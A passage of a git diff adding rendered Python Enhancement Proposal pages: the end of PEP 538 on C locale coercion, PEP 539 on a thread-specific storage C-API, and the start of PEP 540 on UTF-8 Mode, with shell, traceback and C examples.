+  python3 -c 'print("UTF-8:  ", open("utf8.txt", "r", encoding="utf-8").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "r", encoding="gb18030").read().strip())' \
+  | iconv -f GB18030 -t UTF-8
+UTF-8:   ℙƴ☂ℌøἤ
+GB18030: ℙƴ☂ℌøἤ
+
+
+

The rationale for retaining surrogateescape as the default IO encoding is +that it will preserve the following helpful behaviour in the C locale:

+
$ cat gb18030.txt \
+  | LANG=C python3 -c "import sys; print(sys.stdin.read())" \
+  | iconv -f GB18030 -t UTF-8
+ℙƴ☂ℌøἤ
+
+
+

Rather than reverting to the exception currently seen when a UTF-8 based locale is +explicitly configured:

+
$ cat gb18030.txt \
+  | python3 -c "import sys; print(sys.stdin.read())" \
+  | iconv -f GB18030 -t UTF-8
+Traceback (most recent call last):
+File "<string>", line 1, in <module>
+File "/usr/lib64/python3.5/codecs.py", line 321, in decode
+    (result, consumed) = self._buffer_decode(data, self.errors, final)
+UnicodeDecodeError: 'utf-8' codec can't decode byte 0x81 in position 0: invalid start byte
+
+
+

As an added benefit, environments explicitly configured to use one of the +coercion target locales will implicitly gain the encoding transparency behaviour +currently enabled by default in the C locale.

+
+
+

Avoiding setting PYTHONIOENCODING during UTF-8 locale coercion

+

Rather than changing the default handling of the standard streams during +interpreter initialization, earlier versions of this PEP proposed setting +PYTHONIOENCODING to utf-8:surrogateescape. This turned out to create +a significant compatibility problem: since the surrogateescape handler +only exists in Python 3.1+, running Python 2.7 processes in subprocesses could +potentially break in a confusing way with that configuration.

+

The current design means that earlier Python versions will instead retain their +default strict error handling on the standard streams, while Python 3.7+ +will consistently use the more permissive surrogateescape handler even +when these locales are explicitly configured (rather than being reached through +locale coercion).

+
+
+

Dropping official support for ASCII based text handling in the legacy C locale

+

We’ve been trying to get strict bytes/text separation to work reliably in the +legacy C locale for over a decade at this point. Not only haven’t we been able +to get it to work, neither has anyone else - the only viable alternatives +identified have been to pass the bytes along verbatim without eagerly decoding +them to text (C/C++, Python 2.x, Ruby, etc), or else to largely ignore the +nominal C/C++ locale encoding and assume the use of either UTF-8 (PEP 540, +Rust, Go, Node.js, etc) or UTF-16-LE (JVM, .NET CLR).

+

While this PEP ensures that developers that genuinely need to do so can still +opt-in to running their Python code in the legacy C locale (by setting +LC_ALL=C, PYTHONCOERCECLOCALE=0, or running a custom build that sets +--without-c-locale-coercion), it also makes it clear that we don’t +expect Python 3’s Unicode handling to be completely reliable in that +configuration, and the recommended alternative is to use a more appropriate +locale setting (potentially in combination with PEP 540’s UTF-8 mode, if that +is available).

+
+
+

Providing implicit locale coercion only when running standalone

+

The major downside of the proposed design in this PEP is that it introduces a +potential discrepancy between the behaviour of the CPython runtime when it is +run as a standalone application and when it is run as an embedded component +inside a larger system (e.g. mod_wsgi running inside Apache httpd).

+

Over the course of Python 3.x development, multiple attempts have been made +to improve the handling of incorrect locale settings at the point where the +Python interpreter is initialised. The problem that emerged is that this is +ultimately too late in the interpreter startup process - data such as command +line arguments and the contents of environment variables may have already been +retrieved from the operating system and processed under the incorrect ASCII +text encoding assumption well before Py_Initialize is called.

+

The problems created by those inconsistencies were then even harder to diagnose +and debug than those created by believing the operating system’s claim that +ASCII was a suitable encoding to use for operating system interfaces. This was +the case even for the default CPython binary, let alone larger C/C++ +applications that embed CPython as a scripting engine.

+

The approach proposed in this PEP handles that problem by moving the locale +coercion as early as possible in the interpreter startup sequence when running +standalone: it takes place directly in the C-level main() function, even +before calling in to the Py_Main() library function that implements the +features of the CPython interpreter CLI.

+

The Py_Initialize API then only gains an explicit warning (emitted on +stderr) when it detects use of the C locale, and relies on the +embedding application to specify something more reasonable.

+

That said, the reference implementation for this PEP adds most of the +functionality to the shared library, with the CLI being updated to +unconditionally call two new private APIs:

+
if (_Py_LegacyLocaleDetected()) {
+    _Py_CoerceLegacyLocale();
+}
+
+
+

These are similar to other “pre-configuration” APIs intended for embedding +applications: they’re designed to be called before Py_Initialize, and +hence change the way the interpreter gets initialized.

+

If these were made public (either as part of this PEP or in a subsequent RFE), +then it would be straightforward for other embedding applications to recreate +the same behaviour as is proposed for the CPython CLI.

+
+
+

Allowing restoration of the legacy behaviour

+

The CPython command line interpreter is often used to investigate faults that +occur in other applications that embed CPython, and those applications may still +be using the C locale even after this PEP is implemented.

+

Providing a simple on/off switch for the locale coercion behaviour makes it +much easier to reproduce the behaviour of such applications for debugging +purposes, as well as making it easier to reproduce the behaviour of older 3.x +runtimes even when running a version with this change applied.

+
+
+

Querying LC_CTYPE for C locale detection

+

LC_CTYPE is the actual locale category that CPython relies on to drive the +implicit decoding of environment variables, command line arguments, and other +text values received from the operating system.

+

As such, it makes sense to check it specifically when attempting to determine +whether or not the current locale configuration is likely to cause Unicode +handling problems.

+
+
+

Explicitly setting LC_CTYPE for UTF-8 locale coercion

+

Python is often used as a glue language, integrating other C/C++ ABI compatible +components in the current process, and components written in arbitrary +languages in subprocesses.

+

Setting LC_CTYPE to C.UTF-8 is important to handle cases where the +problem has arisen from a setting like LC_CTYPE=UTF-8 being provided on a +system where no UTF-8 locale is defined (e.g. when a Mac OS X ssh client is +configured to forward locale settings, and the user logs into a Linux server).

+

This should be sufficient to ensure that when the locale coercion is activated, +the switch to the UTF-8 based locale will be applied consistently across the +current process and any subprocesses that inherit the current environment.

+
+
+

Avoiding setting LANG for UTF-8 locale coercion

+

Earlier versions of this PEP proposed setting the LANG category independent +default locale, in addition to setting LC_CTYPE.

+

This was later removed on the grounds that setting only LC_CTYPE is +sufficient to handle all of the problematic scenarios that the PEP aimed +to resolve, while setting LANG as well would break cases where LANG +was set correctly, and the locale problems were solely due to an incorrect +LC_CTYPE setting ([22]).

+

For example, consider a Python application that called the Linux date +utility in a subprocess rather than doing its own date formatting:

+
$ LANG=ja_JP.UTF-8 LC_CTYPE=C date
+2017年  5月 23日 火曜日 17:31:03 JST
+
+$ LANG=ja_JP.UTF-8 LC_CTYPE=C.UTF-8 date  # Coercing only LC_CTYPE
+2017年  5月 23日 火曜日 17:32:58 JST
+
+$ LANG=C.UTF-8 LC_CTYPE=C.UTF-8 date  # Coercing both of LC_CTYPE and LANG
+Tue May 23 17:31:10 JST 2017
+
+
+

With only LC_CTYPE updated in the Python process, the subprocess would +continue to behave as expected. However, if LANG was updated as well, +that would effectively override the LC_TIME setting and use the wrong +date formatting conventions.

+
+
+

Avoiding setting LC_ALL for UTF-8 locale coercion

+

Earlier versions of this PEP proposed setting the LC_ALL locale override, +in addition to setting LC_CTYPE.

+

This was changed after it was determined that just setting LC_CTYPE and +LANG should be sufficient to handle all the scenarios the PEP aims to +cover, as it avoids causing any problems in cases like the following:

+
$ LANG=C LC_MONETARY=ja_JP.utf8 ./python -c \
+  "from locale import setlocale, LC_ALL, currency; setlocale(LC_ALL, ''); print(currency(1e6))"
+¥1000000
+
+
+
+
+

Skipping locale coercion if LC_ALL is set in the current environment

+

With locale coercion now only setting LC_CTYPE and LANG, it will have +no effect if LC_ALL is also set. To avoid emitting a spurious locale +coercion notice in that case, coercion is instead skipped entirely.

+
+
+

Considering locale coercion independently of “UTF-8 mode”

+

With both this PEP’s locale coercion and PEP 540’s UTF-8 mode under +consideration for Python 3.7, it makes sense to ask whether or not we can +limit ourselves to only doing one or the other, rather than making both +changes.

+

The UTF-8 mode proposed in PEP 540 has two major limitations that make it a +potential complement to this PEP rather than a potential replacement.

+

First, unlike this PEP, PEP 540’s UTF-8 mode makes it possible to change default +behaviours that are not currently configurable at all. While that’s exactly +what makes the proposal interesting, it’s also what makes it an entirely +unproven approach. By contrast, the approach proposed in this PEP builds +directly atop existing configuration settings for the C locale system ( +LC_CTYPE, LANG) and Python’s standard streams (PYTHONIOENCODING) +that have already been in use for years to handle the kinds of compatibility +problems discussed in this PEP.

+

Secondly, one of the things we know based on that experience is that the +proposed locale coercion can resolve problems not only in CPython itself, +but also in extension modules that interact with the standard streams, like +GNU readline. As an example, consider the following interactive session +from a PEP 538 enabled CPython build, where each line after the first is +executed by doing “up-arrow, left-arrow x4, delete, enter”:

+
$ LANG=C ./python
+Python 3.7.0a0 (heads/pep538-coerce-c-locale:188e780, May  7 2017, 00:21:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌἤ")
+ℙƴ☂ℌἤ
+>>> print("ℙƴ☂ἤ")
+ℙƴ☂ἤ
+>>> print("ℙƴἤ")
+ℙƴἤ
+>>> print("ℙἤ")
+ℙἤ
+>>> print("ἤ")
+ἤ
+>>>
+
+
+

This is exactly what we’d expect from a well-behaved command history editor.

+

By contrast, the following is what currently happens on an older release if +you only change the Python level stream encoding settings without updating the +locale settings:

+
$ LANG=C PYTHONIOENCODING=utf-8:surrogateescape python3
+Python 3.5.3 (default, Apr 24 2017, 13:32:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌ�")
+ File "<stdin>", line 0
+
+   ^
+SyntaxError: 'utf-8' codec can't decode bytes in position 20-21:
+invalid continuation byte
+
+
+

That particular misbehaviour is coming from GNU readline, not CPython - +because the command history editing wasn’t UTF-8 aware, it corrupted the history +buffer and fed such nonsense to stdin that even the surrogateescape error +handler was bypassed. While PEP 540’s UTF-8 mode could technically be updated +to also reconfigure readline, that’s just one extension module that might +be interacting with the standard streams without going through the CPython +C API, and any change made by CPython would only apply when readline is running +directly as part of Python 3.7 rather than in a separate subprocess.

+

However, if we actually change the configured locale, GNU readline starts +behaving itself, without requiring any changes to the embedding application:

+
$ LANG=C.UTF-8 python3
+Python 3.5.3 (default, Apr 24 2017, 13:32:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌἤ")
+ℙƴ☂ℌἤ
+>>> print("ℙƴ☂ἤ")
+ℙƴ☂ἤ
+>>> print("ℙƴἤ")
+ℙƴἤ
+>>> print("ℙἤ")
+ℙἤ
+>>> print("ἤ")
+ἤ
+>>>
+$ LC_CTYPE=C.UTF-8 python3
+Python 3.5.3 (default, Apr 24 2017, 13:32:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌἤ")
+ℙƴ☂ℌἤ
+>>> print("ℙƴ☂ἤ")
+ℙƴ☂ἤ
+>>> print("ℙƴἤ")
+ℙƴἤ
+>>> print("ℙἤ")
+ℙἤ
+>>> print("ἤ")
+ἤ
+>>>
+
+
+
+
+

Enabling C locale coercion and warnings on Mac OS X, iOS and Android

+

On Mac OS X, iOS, and Android, CPython already assumes the use of UTF-8 for +system interfaces, and we expect most other locale-aware components to do the +same.

+

Accordingly, this PEP originally proposed to disable locale coercion and +warnings at build time for these platforms, on the assumption that it would +be entirely redundant.

+

However, that assumption turned out to be incorrect, as subsequent +investigations showed that if you explicitly configure LANG=C on +these platforms, extension modules like GNU readline will misbehave in much the +same way as they do on other *nix systems. [21]

+

In addition, Mac OS X is also frequently used as a development and testing +platform for Python software intended for deployment to other *nix environments +(such as Linux or Android), and Linux is similarly often used as a development +and testing platform for mobile and Mac OS X applications.

+

Accordingly, this PEP enables the locale coercion and warning features by +default on all platforms that use CPython’s autotools based build toolchain +(i.e. everywhere other than Windows).

+
+
+
+

Implementation

+

The reference implementation is being developed in the +pep538-coerce-c-locale feature branch [18] in Alyssa Coghlan’s fork of the +CPython repository on GitHub. A work-in-progress PR is available at [20].

+

This reference implementation covers not only the enhancement request in +issue 28180 [1], but also the Android compatibility fixes needed to resolve +issue 28997 [16].

+
+
+

Backporting to earlier Python 3 releases

+
+

Backporting to Python 3.6.x

+

If this PEP is accepted for Python 3.7, redistributors backporting the change +specifically to their initial Python 3.6.x release will be both allowed and +encouraged. However, such backports should only be undertaken either in +conjunction with the changes needed to also provide a suitable locale by +default, or else specifically for platforms where such a locale is already +consistently available.

+

At least the Fedora project is planning to pursue this approach for the +upcoming Fedora 26 release [19].

+
+
+

Backporting to other 3.x releases

+

While the proposed behavioural change is seen primarily as a bug fix addressing +Python 3’s current misbehaviour in the default ASCII-based C locale, it still +represents a reasonably significant change in the way CPython interacts with +the C locale system. As such, while some redistributors may still choose to +backport it to even earlier Python 3.x releases based on the needs and +interests of their particular user base, this wouldn’t be encouraged as a +general practice.

+

However, configuring Python 3 environments (such as base container +images) to use these configuration settings by default is both allowed +and recommended.

+
+
+
+

Acknowledgements

+

The locale coercion approach proposed in this PEP is inspired directly by +Armin Ronacher’s handling of this problem in the click command line +utility development framework [2]:

+
$ LANG=C python3 -c 'import click; cli = click.command()(lambda:None); cli()'
+Traceback (most recent call last):
+  ...
+RuntimeError: Click will abort further execution because Python 3 was
+configured to use ASCII as encoding for the environment.  Either run this
+under Python 2 or consult http://click.pocoo.org/python3/ for mitigation
+steps.
+
+This system supports the C.UTF-8 locale which is recommended.
+You might be able to resolve your issue by exporting the
+following environment variables:
+
+    export LC_ALL=C.UTF-8
+    export LANG=C.UTF-8
+
+
+

The change was originally proposed as a downstream patch for Fedora’s +system Python 3.6 package [3], and then reformulated as a PEP for Python 3.7 +with a section allowing for backports to earlier versions by redistributors. +In parallel with the development of the upstream patch, Charalampos Stratakis +has been working on the Fedora 26 backport and providing feedback on the +practical viability of the proposed changes.

+

The initial draft was posted to the Python Linux SIG for discussion [10] and +then amended based on both that discussion and Victor Stinner’s work in +PEP 540 [11].

+

The “ℙƴ☂ℌøἤ” string used in the Unicode handling examples throughout this PEP +is taken from Ned Batchelder’s excellent “Pragmatic Unicode” presentation [9].

+

Stephen Turnbull has long provided valuable insight into the text encoding +handling challenges he regularly encounters at the University of Tsukuba +(筑波大学).

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0538.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0539/index.html b/pep-0539/index.html new file mode 100644 index 00000000000..346341ef895 --- /dev/null +++ b/pep-0539/index.html @@ -0,0 +1,567 @@ + + + + + + + + PEP 539 – A New C-API for Thread-Local Storage in CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 539 – A New C-API for Thread-Local Storage in CPython

+
+
Author:
+
Erik M. Bray, Masayuki Yamamoto
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Dec-2016
+
Python-Version:
+
3.7
+
Post-History:
+
16-Dec-2016, 31-Aug-2017, 08-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The proposal is to add a new Thread Local Storage (TLS) API to CPython which +would supersede use of the existing TLS API within the CPython interpreter, +while deprecating the existing API. The new API is named the “Thread +Specific Storage (TSS) API” (see Rationale for Proposed Solution for the +origin of the name).

+

Because the existing TLS API is only used internally (it is not mentioned in +the documentation, and the header that defines it, pythread.h, is not +included in Python.h either directly or indirectly), this proposal +probably only affects CPython, but might also affect other interpreter +implementations (PyPy?) that implement parts of the CPython API.

+

This is motivated primarily by the fact that the old API uses int to +represent TLS keys across all platforms, which is neither POSIX-compliant, +nor portable in any practical sense [1].

+
+

Note

+

Throughout this document the acronym “TLS” refers to Thread Local +Storage and should not be confused with “Transportation Layer Security” +protocols.

+
+
+
+

Specification

+

The current API for TLS used inside the CPython interpreter consists of 6 +functions:

+
PyAPI_FUNC(int) PyThread_create_key(void)
+PyAPI_FUNC(void) PyThread_delete_key(int key)
+PyAPI_FUNC(int) PyThread_set_key_value(int key, void *value)
+PyAPI_FUNC(void *) PyThread_get_key_value(int key)
+PyAPI_FUNC(void) PyThread_delete_key_value(int key)
+PyAPI_FUNC(void) PyThread_ReInitTLS(void)
+
+
+

These would be superseded by a new set of analogous functions:

+
PyAPI_FUNC(int) PyThread_tss_create(Py_tss_t *key)
+PyAPI_FUNC(void) PyThread_tss_delete(Py_tss_t *key)
+PyAPI_FUNC(int) PyThread_tss_set(Py_tss_t *key, void *value)
+PyAPI_FUNC(void *) PyThread_tss_get(Py_tss_t *key)
+
+
+

The specification also adds a few new features:

+
    +
  • A new type Py_tss_t–an opaque type the definition of which may +depend on the underlying TLS implementation. It is defined:
    typedef struct {
    +    int _is_initialized;
    +    NATIVE_TSS_KEY_T _key;
    +} Py_tss_t;
    +
    +
    +

    where NATIVE_TSS_KEY_T is a macro whose value depends on the +underlying native TLS implementation (e.g. pthread_key_t).

    +
  • +
  • An initializer for Py_tss_t variables, Py_tss_NEEDS_INIT.
  • +
  • Three new functions:
    PyAPI_FUNC(Py_tss_t *) PyThread_tss_alloc(void)
    +PyAPI_FUNC(void) PyThread_tss_free(Py_tss_t *key)
    +PyAPI_FUNC(int) PyThread_tss_is_created(Py_tss_t *key)
    +
    +
    +

    The first two are needed for dynamic (de-)allocation of a Py_tss_t, +particularly in extension modules built with Py_LIMITED_API, where +static allocation of this type is not possible due to its implementation +being opaque at build time. A value returned by PyThread_tss_alloc is +in the same state as a value initialized with Py_tss_NEEDS_INIT, or +NULL in the case of dynamic allocation failure. The behavior of +PyThread_tss_free involves calling PyThread_tss_delete +preventively, or is a no-op if the value pointed to by the key +argument is NULL. PyThread_tss_is_created returns non-zero if the +given Py_tss_t has been initialized (i.e. by PyThread_tss_create).

    +
  • +
+

The new TSS API does not provide functions which correspond to +PyThread_delete_key_value and PyThread_ReInitTLS, because these +functions were needed only for CPython’s now defunct built-in TLS +implementation; that is the existing behavior of these functions is treated +as follows: PyThread_delete_key_value(key) is equivalent to +PyThread_set_key_value(key, NULL), and PyThread_ReInitTLS() is a +no-op [8].

+

The new PyThread_tss_ functions are almost exactly analogous to their +original counterparts with a few minor differences: Whereas +PyThread_create_key takes no arguments and returns a TLS key as an +int, PyThread_tss_create takes a Py_tss_t* as an argument and +returns an int status code. The behavior of PyThread_tss_create is +undefined if the value pointed to by the key argument is not initialized +by Py_tss_NEEDS_INIT. The returned status code is zero on success +and non-zero on failure. The meanings of non-zero status codes are not +otherwise defined by this specification.

+

Similarly the other PyThread_tss_ functions are passed a Py_tss_t* +whereas previously the key was passed by value. This change is necessary, as +being an opaque type, the Py_tss_t type could hypothetically be almost +any size. This is especially necessary for extension modules built with +Py_LIMITED_API, where the size of the type is not known. Except for +PyThread_tss_free, the behaviors of PyThread_tss_ are undefined if the +value pointed to by the key argument is NULL.

+

Moreover, because of the use of Py_tss_t instead of int, there are +behaviors in the new API which differ from the existing API with regard to +key creation and deletion. PyThread_tss_create can be called repeatedly +on the same key–calling it on an already initialized key is a no-op and +immediately returns success. Similarly for calling PyThread_tss_delete +with an uninitialized key.

+

The behavior of PyThread_tss_delete is defined to change the key’s +initialization state to “uninitialized”–this allows, for example, +statically allocated keys to be reset to a sensible state when restarting +the CPython interpreter without terminating the process (e.g. embedding +Python in an application) [12].

+

The old PyThread_*_key* functions will be marked as deprecated in the +documentation, but will not generate runtime deprecation warnings.

+

Additionally, on platforms where sizeof(pthread_key_t) != sizeof(int), +PyThread_create_key will return immediately with a failure status, and +the other TLS functions will all be no-ops on such platforms.

+
+

Comparison of API Specification

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
APIThread Local Storage (TLS)Thread Specific Storage (TSS)
VersionExistingNew
Key TypeintPy_tss_t (opaque type)
Handle Native Keycast to intconceal into internal field
Function ArgumentintPy_tss_t *
Features
    +
  • create key
  • +
  • delete key
  • +
  • set value
  • +
  • get value
  • +
  • delete value
  • +
  • reinitialize keys (after +fork)
  • +
+
    +
  • create key
  • +
  • delete key
  • +
  • set value
  • +
  • get value
  • +
  • (set NULL instead) [8]
  • +
  • (unnecessary) [8]
  • +
  • dynamically (de-)allocate +key
  • +
  • check key’s initialization +state
  • +
+
Key Initializer(-1 as key creation +failure)Py_tss_NEEDS_INIT
Requirementnative threads +(since CPython 3.7 [9])native threads
RestrictionNo support for platforms +where native TLS key is +defined in a way that cannot +be safely cast to int.Unable to statically allocate +keys when Py_LIMITED_API +is defined.
+
+
+

Example

+

With the proposed changes, a TSS key is initialized like:

+
static Py_tss_t tss_key = Py_tss_NEEDS_INIT;
+if (PyThread_tss_create(&tss_key)) {
+    /* ... handle key creation failure ... */
+}
+
+
+

The initialization state of the key can then be checked like:

+
assert(PyThread_tss_is_created(&tss_key));
+
+
+

The rest of the API is used analogously to the old API:

+
int the_value = 1;
+if (PyThread_tss_get(&tss_key) == NULL) {
+    PyThread_tss_set(&tss_key, (void *)&the_value);
+    assert(PyThread_tss_get(&tss_key) != NULL);
+}
+/* ... once done with the key ... */
+PyThread_tss_delete(&tss_key);
+assert(!PyThread_tss_is_created(&tss_key));
+
+
+

When Py_LIMITED_API is defined, a TSS key must be dynamically allocated:

+
static Py_tss_t *ptr_key = PyThread_tss_alloc();
+if (ptr_key == NULL) {
+    /* ... handle key allocation failure ... */
+}
+assert(!PyThread_tss_is_created(ptr_key));
+/* ... once done with the key ... */
+PyThread_tss_free(ptr_key);
+ptr_key = NULL;
+
+
+
+
+
+

Platform Support Changes

+

A new “Native Thread Implementation” section will be added to PEP 11 that +states:

+
    +
  • As of CPython 3.7, all platforms are required to provide a native thread +implementation (such as pthreads or Windows) to implement the TSS +API. Any TSS API problems that occur in an implementation without native +threads will be closed as “won’t fix”.
  • +
+
+
+

Motivation

+

The primary problem at issue here is the type of the keys (int) used for +TLS values, as defined by the original PyThread TLS API.

+

The original TLS API was added to Python by GvR back in 1997, and at the +time the key used to represent a TLS value was an int, and so it has +been to the time of writing. This used CPython’s own TLS implementation +which long remained unused, largely unchanged, in Python/thread.c. Support +for implementation of the API on top of native thread implementations +(pthreads and Windows) was added much later, and the built-in implementation +has been deemed no longer necessary and has since been removed [9].

+

The problem with the choice of int to represent a TLS key, is that while +it was fine for CPython’s own TLS implementation, and happens to be +compatible with Windows (which uses DWORD for the analogous data), it is +not compatible with the POSIX standard for the pthreads API, which defines +pthread_key_t as an opaque type not further defined by the standard (as +with Py_tss_t described above) [14]. This leaves it up to the underlying +implementation how a pthread_key_t value is used to look up +thread-specific data.

+

This has not generally been a problem for Python’s API, as it just happens +that on Linux pthread_key_t is defined as an unsigned int, and so is +fully compatible with Python’s TLS API–pthread_key_t’s created by +pthread_create_key can be freely cast to int and back (well, not +exactly, even this has some limitations as pointed out by issue #22206).

+

However, as issue #25658 points out, there are at least some platforms +(namely Cygwin, CloudABI, but likely others as well) which have otherwise +modern and POSIX-compliant pthreads implementations, but are not compatible +with Python’s API because their pthread_key_t is defined in a way that +cannot be safely cast to int. In fact, the possibility of running into +this problem was raised by MvL at the time pthreads TLS was added [2].

+

It could be argued that PEP 11 makes specific requirements for supporting a +new, not otherwise officially-support platform (such as CloudABI), and that +the status of Cygwin support is currently dubious. However, this creates a +very high barrier to supporting platforms that are otherwise Linux- and/or +POSIX-compatible and where CPython might otherwise “just work” except for +this one hurdle. CPython itself imposes this implementation barrier by way +of an API that is not compatible with POSIX (and in fact makes invalid +assumptions about pthreads).

+
+
+

Rationale for Proposed Solution

+

The use of an opaque type (Py_tss_t) to key TLS values allows the API to +be compatible with all present (POSIX and Windows) and future (C11?) native +TLS implementations supported by CPython, as it allows the definition of +Py_tss_t to depend on the underlying implementation.

+

Since the existing TLS API has been available in the limited API [13] for +some platforms (e.g. Linux), CPython makes an effort to provide the new TSS +API at that level likewise. Note, however, that the Py_tss_t definition +becomes to be an opaque struct when Py_LIMITED_API is defined, because +exposing NATIVE_TSS_KEY_T as part of the limited API would prevent us +from switching native thread implementation without rebuilding extension +modules.

+

A new API must be introduced, rather than changing the function signatures of +the current API, in order to maintain backwards compatibility. The new API +also more clearly groups together these related functions under a single name +prefix, PyThread_tss_. The “tss” in the name stands for “thread-specific +storage”, and was influenced by the naming and design of the “tss” API that is +part of the C11 threads API [15]. However, this is in no way meant to imply +compatibility with or support for the C11 threads API, or signal any future +intention of supporting C11–it’s just the influence for the naming and design.

+

The inclusion of the special initializer Py_tss_NEEDS_INIT is required +by the fact that not all native TLS implementations define a sentinel value +for uninitialized TLS keys. For example, on Windows a TLS key is +represented by a DWORD (unsigned int) and its value must be treated +as opaque [3]. So there is no unsigned integer value that can be safely +used to represent an uninitialized TLS key on Windows. Likewise, POSIX +does not specify a sentinel for an uninitialized pthread_key_t, instead +relying on the pthread_once interface to ensure that a given TLS key is +initialized only once per-process. Therefore, the Py_tss_t type +contains an explicit ._is_initialized that can indicate the key’s +initialization state independent of the underlying implementation.

+

Changing PyThread_create_key to immediately return a failure status on +systems using pthreads where sizeof(int) != sizeof(pthread_key_t) is +intended as a sanity check: Currently, PyThread_create_key may report +initial success on such systems, but attempts to use the returned key are +likely to fail. Although in practice this failure occurs earlier in the +interpreter initialization, it’s better to fail immediately at the source of +problem (PyThread_create_key) rather than sometime later when use of an +invalid key is attempted. In other words, this indicates clearly that the +old API is not supported on platforms where it cannot be used reliably, and +that no effort will be made to add such support.

+
+
+

Rejected Ideas

+
    +
  • Do nothing: The status quo is fine because it works on Linux, and platforms +wishing to be supported by CPython should follow the requirements of +PEP 11. As explained above, while this would be a fair argument if +CPython were being to asked to make changes to support particular quirks +or features of a specific platform, in this case it is a quirk of CPython +that prevents it from being used to its full potential on otherwise +POSIX-compliant platforms. The fact that the current implementation +happens to work on Linux is a happy accident, and there’s no guarantee +that this will never change.
  • +
  • Affected platforms should just configure Python --without-threads: +this is no longer an option as the --without-threads option has +been removed for Python 3.7 [16].
  • +
  • Affected platforms should use CPython’s built-in TLS implementation +instead of a native TLS implementation: This is a more acceptable +alternative to the previous idea, and in fact there had been a patch to do +just that [4]. However, the built-in implementation being “slower and +clunkier” in general than native implementations still needlessly hobbles +performance on affected platforms. At least one other module +(tracemalloc) is also broken if Python is built without a native TLS +implementation. This idea also cannot be adopted because the built-in +implementation has since been removed.
  • +
  • Keep the existing API, but work around the issue by providing a mapping from +pthread_key_t values to int values. A couple attempts were made at +this ([5], [6]), but this injects needless complexity and overhead +into performance-critical code on platforms that are not currently affected +by this issue (such as Linux). Even if use of this workaround were made +conditional on platform compatibility, it introduces platform-specific code +to maintain, and still has the problem of the previous rejected ideas of +needlessly hobbling performance on affected platforms.
  • +
+
+
+

Implementation

+

An initial version of a patch [7] is available on the bug tracker for this +issue. Since the migration to GitHub, its development has continued in the +pep539-tss-api feature branch [10] in Masayuki Yamamoto’s fork of the +CPython repository on GitHub. A work-in-progress PR is available at [11].

+

This reference implementation covers not only the new API implementation +features, but also the client code updates needed to replace the existing +TLS API with the new TSS API.

+
+ +
+

References and Footnotes

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0539.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0540/index.html b/pep-0540/index.html new file mode 100644 index 00000000000..3dee9f07a41 --- /dev/null +++ b/pep-0540/index.html @@ -0,0 +1,499 @@ + + + + + + + + PEP 540 – Add a new UTF-8 Mode | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 540 – Add a new UTF-8 Mode

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
INADA Naoki
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Jan-2016
+
Python-Version:
+
3.7
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new “UTF-8 Mode” to enhance Python’s use of UTF-8. When UTF-8 Mode +is active, Python will:

+
    +
  • use the utf-8 encoding, regardless of the locale currently set by +the current platform, and
  • +
  • change the stdin and stdout error handlers to +surrogateescape.
  • +
+

This mode is off by default, but is automatically activated when using +the “POSIX” locale.

+

Add the -X utf8 command line option and PYTHONUTF8 environment +variable to control UTF-8 Mode.

+
+
+

Rationale

+
+

Locale encoding and UTF-8

+

Python 3.6 uses the locale encoding for filenames, environment +variables, standard streams, etc. The locale encoding is inherited from +the locale; the encoding and the locale are tightly coupled.

+

Many users inherit the ASCII encoding from the POSIX locale, aka the “C” +locale, but are unable change the locale for various reasons. This +encoding is very limited in term of Unicode support: any non-ASCII +character is likely to cause trouble.

+

It isn’t always easy to get an accurate locale. Locales don’t get the +exact same name on different Linux distributions, FreeBSD, macOS, etc. +And some locales, like the recent C.UTF-8 locale, are only supported +by a few platforms. The current locale can even vary on the same +platform depending on context; for example, a SSH connection can use a +different encoding than the filesystem or local terminal encoding on the +same machine.

+

On the flip side, Python 3.6 is already using UTF-8 by default on macOS, +Android and Windows (PEP 529) for most functions – although +open() is a notable exception here. UTF-8 is also the default +encoding of Python scripts, XML and JSON file formats. The Go +programming language +uses UTF-8 for all strings.

+

UTF-8 support is nearly ubiquitous for data read and written by modern +platforms. It also has excellent support in Python. The problem is +simply that the locale is frequently misconfigured. An obvious solution +suggests itself: ignore the locale encoding and use UTF-8.

+
+
+

Passthrough for undecodable bytes: surrogateescape

+

When decoding bytes from UTF-8 using the default strict error +handler, Python 3 raises a UnicodeDecodeError on the first +undecodable byte.

+

